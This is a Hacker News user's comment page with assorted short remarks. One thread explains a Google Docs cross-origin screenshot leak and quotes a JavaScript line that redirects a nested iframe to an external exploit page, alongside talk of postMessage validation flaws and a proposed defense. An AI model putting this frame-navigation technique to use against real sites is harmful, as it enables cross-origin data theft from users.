Hacker News new | past | comments | ask | show | jobs | submit | hackerpain's comments login

Using it since a decade, I faced bugs in the PGP encryption add on, they need to work on a lot of things to make it secure. This is my go-to Jabber client.


How does this kind of vulnerability even remain, after code reviews?

Is it hard to spot?


This bug was found by my friend. David has found many creative bugs and we worked on a project together :)

Must say a quick thinker, and he's just 17 or 18.


I think ReCaptcha has been like this since at least last 6 years. Are they copying research?

https://www.youtube.com/watch?v=_RDXtILdkV0&persist_app=1&ap...


Please ignore


they haven't mentioned if an API (or, endpoint) is being DDoSed, just an incident update?


Indeed.


That's quite hard because getting established in one trade in the industry itself takes a lot of time and effort.


Yeah good point. I guess you could also get distracted. Eating dinner but I will think it over more.


We spent like 12 years trying to create a medium sized business in electronics and we were at that time in an era when mobile phones were still getting popular. It was a nascent stage of refurb smartphone industry but even then it was a steep climb for us!

But there are companies operating in the same segment that started later, with VC and investor backing who rose quite fast.


Install code-server (https://github.com/cdr/code-server) on a server, and using it in your phone's browser to develop small web apps (works well in landscape mode with 6 -6.7 inch phones)

If you have a powerful processor and adequate RAM - you can do almost any thing that you do on desktop/pc


docs.google.com didn't have X-Frame-Options: DENY nor a restrictive CSP so I think its a browser quirk (rather, a clever bypass) that works here. Also, the author had exploited a postMessage flaw which wasn't validating the host name properly that led to the cross-origin leak of screenshot data

Check this out https://youtu.be/KpkrTUHoWsQ (video about URL validation bypass and SOP)


The missing header just means that docs.google.com can be embedded in an iframe, I'm not surprised about that. But the parent window still shouldn't be able to access the contents of that iframe. And in fact this doesn't work:

    document.getElementsByTagName('iframe')[0].contentDocument.getElementsByTagName('iframe')[0].src = "https://geekycat.in/exploit.html";
For obvious reasons (you can't access the DOM of a cross-origin iframe). So it's surprising that this works:

    window.frames[0].frames[0].location = "https://geekycat.in/exploit.html";


For legacy reasons the location object is special (you can write to it which is a proxy to writing to `location.href`). Some details here https://developer.mozilla.org/en-US/docs/Web/Security/Same-o...

This is actually quite difficult to protect against while keeping functionality intact (not granting allow-scripts to iframes would do it, but also obviously disable JavaScript).

The emerging https://github.com/dtapuska/documentaccess standard would be a defense-in-depth against this attack.


Myeah. I was aware that `WindowProxy.location` exists, but not that `WindowProxy.frames` exists. To me, that's the more surprising part - as `window.frames[0].location` should indeed be writable, but I feel like accessing `window.frames[0].frames` is more debatable - even knowing the number of iframes in a page might leak information in certain cases.


Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: